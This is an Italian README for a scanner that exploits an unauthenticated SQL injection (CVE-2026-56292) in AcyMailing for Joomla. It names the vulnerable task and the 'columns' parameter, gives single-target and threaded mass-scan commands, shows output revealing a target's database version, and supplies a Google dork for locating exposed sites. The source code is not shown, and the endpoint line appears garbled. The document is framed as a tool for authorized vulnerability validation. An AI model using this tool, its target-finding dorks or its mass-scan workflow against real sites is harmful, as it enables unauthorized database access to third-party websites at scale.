
CVE-2026-56292 - Scanner di SQL injection non autenticato per AcyMailing per Joomla
Autore: nullwhisper
Solo per ricerca di sicurezza autorizzata / validazione di vulnerabilità.
AcyMailing for Joomla espone il task pubblico del front-end frontentityselect::loadEntityFront. Nelle versioni precedenti, il parametro columns viene passato direttamente in una query SQL senza sanitizzazione. Le versioni patchate usano acym_secureDBColumn() e restituiscono un errore come ... not secured.
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
Singolo target:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
Scansione di massa:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
Opzioni:
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
Testato su un'installazione di AcyMailing v11.0.3 in un laboratorio locale con Joomla 5 (modalità di simulazione vulnerabile).
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
Vedi dorks.txt. Dork principale:
inurl:"index.php?option=com_acym"
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a ricerca. Non utilizzarlo contro sistemi che non possiedi o per i quali non hai un'esplicita autorizzazione scritta al test. L'autore (nullwhisper) non è responsabile per usi impropri o danni causati da questo codice.
MIT — vedi LICENSE.